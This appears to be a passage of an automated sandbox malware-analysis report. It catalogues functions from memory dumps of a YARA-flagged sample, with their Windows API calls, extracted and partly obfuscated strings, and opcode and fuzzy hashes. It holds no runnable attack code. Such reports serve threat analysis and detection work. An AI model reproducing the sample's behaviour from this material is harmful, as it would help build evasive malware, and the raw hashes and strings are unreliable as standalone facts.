                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Initialize
                                                        • String ID: @J7<
                                                        • API String ID: 2538663250-2016760708
                                                        • Opcode ID: 4d54ce7a37326a304db02867e40042381b1eac917726625c686ee37c97ea1e09
                                                        • Instruction ID: 9e87204c81f727fa874f234668f2df7209fb3ddba2963b138cb0bb6550201202
                                                        • Opcode Fuzzy Hash: 4d54ce7a37326a304db02867e40042381b1eac917726625c686ee37c97ea1e09
                                                        • Instruction Fuzzy Hash: 13315DB6A0060AAFDB00DFD8C880DEFB7B9FF89304B108559E505EB214D771EE058BA0
                                                        Function 003A4530 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 003A45A2
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        • Opcode ID: 972c7fab56d31af967c755d90e9ef108d00ec9d04763406e6b29f8982412051b
                                                        • Instruction ID: 72dad015d21b1977bac77bd93eb72c1724149a6696b1ae893fd7b03493b77357
                                                        • Opcode Fuzzy Hash: 972c7fab56d31af967c755d90e9ef108d00ec9d04763406e6b29f8982412051b
                                                        • Instruction Fuzzy Hash: 27011EB5D0020DABDF11DAE4DC42FEEB3B89B55308F0045A5AA189B641F671EB18CB91
                                                        Function 003A7CB9 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNELBASE(00008003,?,?,003A1A50,n;,003B47C7,?), ref: 003A7CB3
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: dd65792723ae9fd66fcfeedc2e8d02089bee0548cb332b161f4166d704fb5b6f
                                                        • Instruction ID: e886cdbbe2ee1f3047e2e4fb197289f9707ac04ecabc25e111064800d95bf84c
                                                        • Opcode Fuzzy Hash: dd65792723ae9fd66fcfeedc2e8d02089bee0548cb332b161f4166d704fb5b6f
                                                        • Instruction Fuzzy Hash: 2CF0FCB1A582097DDB22ABF0AC8AFB773A8DB49314F0141C1FD0CCB182E531CA444765
                                                        Function 00399610 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00399655
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateThread
                                                        • String ID:
                                                        • API String ID: 2422867632-0
                                                        • Opcode ID: 9e044ac81ecd3d76f2d35643b4dd80fb48114af77149b2918e82637a0373a14e
                                                        • Instruction ID: cf56d8c90087b8402fa5091f37f329aa536e7c1f26c46ddd69615ebbce45dec4
                                                        • Opcode Fuzzy Hash: 9e044ac81ecd3d76f2d35643b4dd80fb48114af77149b2918e82637a0373a14e
                                                        • Instruction Fuzzy Hash: 45F06D7778521436F72165AE9C02FDBB79CCB80B72F140426F70CEB5C2E996B84142A8
                                                        Function 0039960C Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00399655
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateThread
                                                        • String ID:
                                                        • API String ID: 2422867632-0
                                                        • Opcode ID: 31a339a0fe685c5d69a0da535bba5454bbf5db903bb10758d20300006e6499f5
                                                        • Instruction ID: 078887dff9f54680937343a93d9cedd81530946ac365c0b0f3b88476f63a00fa
                                                        • Opcode Fuzzy Hash: 31a339a0fe685c5d69a0da535bba5454bbf5db903bb10758d20300006e6499f5
                                                        • Instruction Fuzzy Hash: B1E0927778021437F63161998C03FD7A69C8F80B61F540025F70CAF6C2E996B84042A4
                                                        Function 003A45B0 Relevance: 1.5, APIs: 1, Instructions: 31libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 003A45A2
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        • Opcode ID: f4fb5eefa6fffb4962a7d3246539e07383bb9b19fe4213f3e5edd2d8a6196605
                                                        • Instruction ID: 9fb190cccdef520d2afceb753ae94f087271e082ad8f2d0ef1b8baedb63ea510
                                                        • Opcode Fuzzy Hash: f4fb5eefa6fffb4962a7d3246539e07383bb9b19fe4213f3e5edd2d8a6196605
                                                        • Instruction Fuzzy Hash: 3EE02B01C0D348B39B12D6B96801596BF68CD93128F1046EEDC4897903E5618D198393
                                                        Function 003B8470 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(003A1759,?,003B4F83,003A1759,003B47C7,003B4F83,?,003A1759,003B47C7,00001000,?,?,003B9D20), ref: 003B84AC
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 644e2e3048a2facb707482932b954ae4fdc2bcc182b30525e1394b29ea1e6bfe
                                                        • Instruction ID: 2197073e234e40cb0fc041af4a2189d133a277902e9f00eead6326a4f93ad747
                                                        • Opcode Fuzzy Hash: 644e2e3048a2facb707482932b954ae4fdc2bcc182b30525e1394b29ea1e6bfe
                                                        • Instruction Fuzzy Hash: C6E092B12002057BDA14EE59DC46FDB33ACEFC9750F104019FA08A7242D630B910C7B4
                                                        Function 003B84C0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,C8BB3316,00000007,00000000,00000004,00000000,003A3E0E,000000F4,?,?,?,?,?), ref: 003B84FC
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID:
                                                        • API String ID: 3298025750-0
                                                        • Opcode ID: 2d7a4206cf0a9173fe4b0f884d5e107c5eefc294f47232e3432edd77e42700f4
                                                        • Instruction ID: 4819ca8dcc92f14073e28cf5905d40a774649432954b2505ac38614795419cf4
                                                        • Opcode Fuzzy Hash: 2d7a4206cf0a9173fe4b0f884d5e107c5eefc294f47232e3432edd77e42700f4
                                                        • Instruction Fuzzy Hash: BDE06D726002057BD610EE59DC42FDB33ACEF89714F004019FA09A7242D630B81086B4
                                                        Function 003A7E70 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(?,?,000016A8,?,000004D8,00000000), ref: 003A7E9C
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: 2093d433127face845c024bf963096ebcf0e3cfb88e7646a1e5fc4e013b931b1
                                                        • Instruction ID: e0302f2b25d61ec5da15a6bf24e71c37f03ff33b294648b183dbeb5398e2dca7
                                                        • Opcode Fuzzy Hash: 2093d433127face845c024bf963096ebcf0e3cfb88e7646a1e5fc4e013b931b1
                                                        • Instruction Fuzzy Hash: 3BE0867525430427FB246AA8DC87FA63398CB89728F6946A0B91CDB6C3E578FD414150
                                                        Function 003A45CF Relevance: 1.5, APIs: 1, Instructions: 25libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 003A45A2
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        • Opcode ID: f406b443c95aa8b8bc202753eed502b71b197e91b863d455a3e8fec03a0b445f
                                                        • Instruction ID: 9dde428c0d92ec91f69dab72803977bf56025829fd94db7072b146224744fe16
                                                        • Opcode Fuzzy Hash: f406b443c95aa8b8bc202753eed502b71b197e91b863d455a3e8fec03a0b445f
                                                        • Instruction Fuzzy Hash: 79E0D8766A40045FCB10DAD8DC92F69B3A4D745711F444288E51AC7340D9709E99D752
                                                        Function 00399667 Relevance: 1.5, APIs: 1, Instructions: 22threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00399655
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateThread
                                                        • String ID:
                                                        • API String ID: 2422867632-0
                                                        • Opcode ID: ca5cf424d50c013fcc2e8b286b350509b36337e5946274df91174d223e0f0409
                                                        • Instruction ID: f8a3a37cbc21ac43d39e212fa7d9baa962a1f966e5996eddb4c772b0847469a1
                                                        • Opcode Fuzzy Hash: ca5cf424d50c013fcc2e8b286b350509b36337e5946274df91174d223e0f0409
                                                        • Instruction Fuzzy Hash: 5ED0A73B38430421F521305D1C03FA551484B90B36F26023AFB28E85C0D9D7A843005D
                                                        Function 003A7C80 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNELBASE(00008003,?,?,003A1A50,n;,003B47C7,?), ref: 003A7CB3
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 71007cb775d4f21781496c25e8971b57f8605310341acd307ee508b8ec6fc24c
                                                        • Instruction ID: f9ee0101c7b9001876a93431125ae532ce681f351d877f1c53b3646d8221b95d
                                                        • Opcode Fuzzy Hash: 71007cb775d4f21781496c25e8971b57f8605310341acd307ee508b8ec6fc24c
                                                        • Instruction Fuzzy Hash: C6D05E756843053BF641B6B5DC07F57368C8B48798F454064BA0CFB2C3E855F4004175
                                                        Function 02D42C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: b9b7ecc3d3744fbb8435f47a5f4c6d18a51d35259678ca29588f7544e1dfef10
                                                        • Instruction ID: 329db6da8f5ba7679bd58c3f15237dfc4e31eb5ce9f93e2c6c94df5812b9d180
                                                        • Opcode Fuzzy Hash: b9b7ecc3d3744fbb8435f47a5f4c6d18a51d35259678ca29588f7544e1dfef10
                                                        • Instruction Fuzzy Hash: BEB09B719055D5C6DF11E7604A0D717790067D0701F15C061F6034761E4778C5D1F575

                                                        Non-executed Functions

                                                        Function 0302053E Relevance: .1, Instructions: 149COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4153372963.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3020000_fc.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 47a53ad450088d3469c139e3f0d90be7fb8e262a3935825c81a4b45b28714b48
                                                        • Instruction ID: 407e2ad4917554c18d362bc46c18eb6b3d516775ecc98259f6c232ce7c966b92
                                                        • Opcode Fuzzy Hash: 47a53ad450088d3469c139e3f0d90be7fb8e262a3935825c81a4b45b28714b48
                                                        • Instruction Fuzzy Hash: 6A41297560AB1D4FC368EF68D0816B6F7E6FB85300F50062DD98AC7252EB74E4428784
                                                        Function 003A245D Relevance: .0, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_390000_fc.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9b852aad350d293cb548c66c96eaeacb7aed01e4df245a4c81cae5a05de95eff
                                                        • Instruction ID: 3f501ca3b3911cbbd663b4c327026b9d2c562f9efc7e5a353cc5afa59b89cead
                                                        • Opcode Fuzzy Hash: 9b852aad350d293cb548c66c96eaeacb7aed01e4df245a4c81cae5a05de95eff
                                                        • Instruction Fuzzy Hash: 5FC02B13E109280E60041C4838C20F1E394E0CB177F9433A3C80DF37404403C45D01CD
                                                        Function 0302B549 Relevance: 57.7, Strings: 46, Instructions: 217COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4153372963.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3020000_fc.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                        • API String ID: 0-3754132690
                                                        • Opcode ID: 78b7c0fce2af245d66d1f4bf839006ca4b070487934b7c559596f4784666260f
                                                        • Instruction ID: 2e09b65a4f4f7e86b5f70d99df8e4569f53c0a5a646160c1cc6346f8d1fbb8d5
                                                        • Opcode Fuzzy Hash: 78b7c0fce2af245d66d1f4bf839006ca4b070487934b7c559596f4784666260f
                                                        • Instruction Fuzzy Hash: 149150F04082988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB95
                                                        Function 03022C1D Relevance: 20.0, Strings: 16, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4153372963.0000000003020000.00000040.00000800.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_3020000_fc.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ++4$!:hl$*3:v$,.!:$,4)!$/4*:$2Mst$5-4*$:Mst$:Nhs$:TN:$Wu`s$b,.!$u$vv{5$~umi
                                                        • API String ID: 0-1134480191
                                                        • Opcode ID: ff1558ded7d7be7571725462c0b6561cb454f1bbba32aa8beedea54ad6624013
                                                        • Instruction ID: 07c612d745d13f760f4ba3a55052f88423ecd72a1aefc61dbfb8987a7b82b73f
                                                        • Opcode Fuzzy Hash: ff1558ded7d7be7571725462c0b6561cb454f1bbba32aa8beedea54ad6624013
                                                        • Instruction Fuzzy Hash: 801176B0C5070C9ACF069FD5E8856EDBFB0FF05304FA09158D428AF298DB795A428F99
                                                        Function 02D42890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        • Opcode ID: 07fb48bd858f1f71ea7e0aed3e3c7de8204fa76814588b2957571dace55271b3
                                                        • Instruction ID: 223837d98825ac3dc86bc7ef244efb8d5b1d93d9ca8d049a366f1dc0b74eaf53
                                                        • Opcode Fuzzy Hash: 07fb48bd858f1f71ea7e0aed3e3c7de8204fa76814588b2957571dace55271b3
                                                        • Instruction Fuzzy Hash: 7451C8B6A00156BFDB10DBA8889497EFBB8BB08305B548269F895D7741E774DE40CBE0
                                                        Function 02DB2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        • Opcode ID: 9b0d7c3780fff40a84674ba03347b07aa7bc3a87f1e10d075e9199d43ff69a09
                                                        • Instruction ID: a3b66d86175bfd26bf864a15a034aa0ae68f4304f0c68c9bbeca36e15237bd78
                                                        • Opcode Fuzzy Hash: 9b0d7c3780fff40a84674ba03347b07aa7bc3a87f1e10d075e9199d43ff69a09
                                                        • Instruction Fuzzy Hash: 6451E572A00685EADB25DE58C8A49BFB7F9EF48300B44846AE9D7C7741D7B4DE40CB60
                                                        Function 02D37630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • Execute=1, xrefs: 02D74713
                                                        • ExecuteOptions, xrefs: 02D746A0
                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02D746FC
                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02D74742
                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02D74655
                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02D74725
                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 02D74787
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                        • API String ID: 0-484625025
                                                        • Opcode ID: b0a9a90b2984c8033a2ad964230e15d6cb30357c38605a3d3d9da5f8784af60c
                                                        • Instruction ID: 8db5aba12800a62571855480ba915673546fc3f5261cf50076761edd91afb401
                                                        • Opcode Fuzzy Hash: b0a9a90b2984c8033a2ad964230e15d6cb30357c38605a3d3d9da5f8784af60c
                                                        • Instruction Fuzzy Hash: 9D51F6B1A406597BFF12ABA4DC95FAEB3B9EF04304F1400A9D505A7390EB709E45CF60
                                                        Function 02D4B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: __aulldvrm
                                                        • String ID: +$-$0$0
                                                        • API String ID: 1302938615-699404926
                                                        • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                        • Instruction ID: 60a690e887a9819630a353c87c6074c6dd1075eb31c9e1a5992ca37efef67507
                                                        • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                        • Instruction Fuzzy Hash: 3A817170E052899FDF248F68C451BBEBBA2AF65318F18415BD891AB391CF34DC41CB64
                                                        Function 02DB20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: %%%u$[$]:%u
                                                        • API String ID: 48624451-2819853543
                                                        • Opcode ID: 04d2b1b3e2f88e58dd8f5601222c85b658caafd92e96bc3c13a102ab051ca6b7
                                                        • Instruction ID: 02412a95e6e71ca26a3f7ecae7875beb59e02f6581c1c84fe64d62333706ac34
                                                        • Opcode Fuzzy Hash: 04d2b1b3e2f88e58dd8f5601222c85b658caafd92e96bc3c13a102ab051ca6b7
                                                        • Instruction Fuzzy Hash: 9A212176A00119ABDB11DE69D854AEEB7E9EF58784F440126ED46D3300EB309E02CBA1
                                                        Function 02D2F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02D702E7
                                                        • RTL: Re-Waiting, xrefs: 02D7031E
                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02D702BD
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                        • API String ID: 0-2474120054
                                                        • Opcode ID: 5046ccfe3b10ffb7f6935af44c4c837dc2ce5164570ca779746f1276009c84a2
                                                        • Instruction ID: 5b529bf183d5de81d0409de610e3cdb936e5c9cdff8e272d003f3a66b9275d14
                                                        • Opcode Fuzzy Hash: 5046ccfe3b10ffb7f6935af44c4c837dc2ce5164570ca779746f1276009c84a2
                                                        • Instruction Fuzzy Hash: B8E19B716087419FD724CF28C884B2AB7F1EB94728F144A69F5A58B7E0E778DC48CB52
                                                        Function 02D3BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02D77B7F
                                                        • RTL: Re-Waiting, xrefs: 02D77BAC
                                                        • RTL: Resource at %p, xrefs: 02D77B8E
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.4152970303.0000000002CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: true
                                                        • Associated: 00000009.00000002.4152970303.0000000002DF9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002DFD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000009.00000002.4152970303.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_2cd0000_fc.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 0-871070163
                                                        • Opcode ID: e9c315c59059752e6e0b0e5f1c8b2c5d3bff98aefbd7cb8f421187feda2df5c3
                                                        • Instruction ID: 3dde8b13807ba33a1ac3b0c1f781453562c71af2e4bc802c5cd6f0ea1a31e94c
                                                        • Opcode Fuzzy Hash: e9c315c59059752e6e0b0e5f1c8b2c5d3bff98aefbd7cb8f421187feda2df5c3
